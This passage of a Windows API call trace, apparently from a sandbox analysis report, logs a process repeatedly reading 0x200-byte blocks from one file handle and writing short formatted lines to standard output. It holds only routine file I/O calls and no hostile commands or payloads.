(_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.069] GetFileType (hFile=0x50) returned 0x1 [0195.069] _get_osfhandle (_FileHandle=1) returned 0x50 
[0195.069] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.070] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.070] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 
[0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] GetFileType (hFile=0x50) returned 0x1 [0195.070] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.070] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] GetFileType (hFile=0x50) returned 0x1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.071] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.071] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, 
lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] GetFileType (hFile=0x50) returned 0x1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] GetFileType (hFile=0x50) returned 0x1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] GetFileType (hFile=0x50) returned 0x1 [0195.071] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.071] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] GetFileType (hFile=0x50) returned 0x1 [0195.072] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.072] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.073] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.073] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType 
(hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.073] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.073] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.074] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.074] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] GetFileType (hFile=0x50) returned 0x1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.074] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, 
lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.075] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.075] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.075] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.075] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: 
hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.076] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.076] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.076] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.076] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.076] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0195.076] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 
[0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2af1b4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af1b4*, lpNumberOfBytesWritten=0x2ae1b8*=0x20, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.077] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae1a4 | out: lpNewFilePointer=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=4) returned 0x58 [0195.077] ReadFile (in: hFile=0x58, lpBuffer=0x2aefd4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae1c4, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesRead=0x2ae1c4*=0x200, lpOverlapped=0x0) returned 1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] GetFileType (hFile=0x50) returned 0x1 [0195.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.077] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae1b8*=0x50, lpOverlapped=0x0) returned 1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] GetFileType (hFile=0x50) returned 0x1 [0195.078] _get_osfhandle (_FileHandle=1) returned 0x50 [0195.078] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae1b8, 
